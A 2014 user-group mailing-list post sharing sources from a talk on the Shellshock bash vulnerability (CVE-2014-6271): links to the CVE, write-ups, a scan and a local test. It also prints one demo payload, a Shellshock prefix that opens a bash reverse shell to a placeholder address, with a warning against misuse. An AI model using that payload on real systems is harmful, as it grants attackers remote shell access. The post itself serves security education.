[dundee] shellshock (bash bug)
Gordon Gray
gordo.gray at gmail.com
Thu Sep 25 22:15:25 UTC 2014
sources from my talk earlier:
cve
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
better explanation
http://seclists.org/oss-sec/2014/q3/650
easy to use poc
https://pay.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/
pretty decent writeup
http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html
ping scan
http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html
local bash test
http://security.stackexchange.com/questions/68168/is-there-a-short-command-to-test-if-my-server-is-secure-against-the-shellshock-b
and this is the live demo i would have done if my vps host wasn't being
dos'd. don't run this on anything you don't (already) own
() { :; }; bash -i >& /dev/tcp/X.X.X.X/8080 0>&1
mail me to discuss public demos if you need to scare the shit out of your
boss for a budget increase :)
but seriously, don't break the law. if you do it's not my fault. i'm not
liable. don't sue me. ass covered.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mailman.lug.org.uk/pipermail/dundee/attachments/20140925/447fd251/attachment.html>
More information about the dundee
mailing list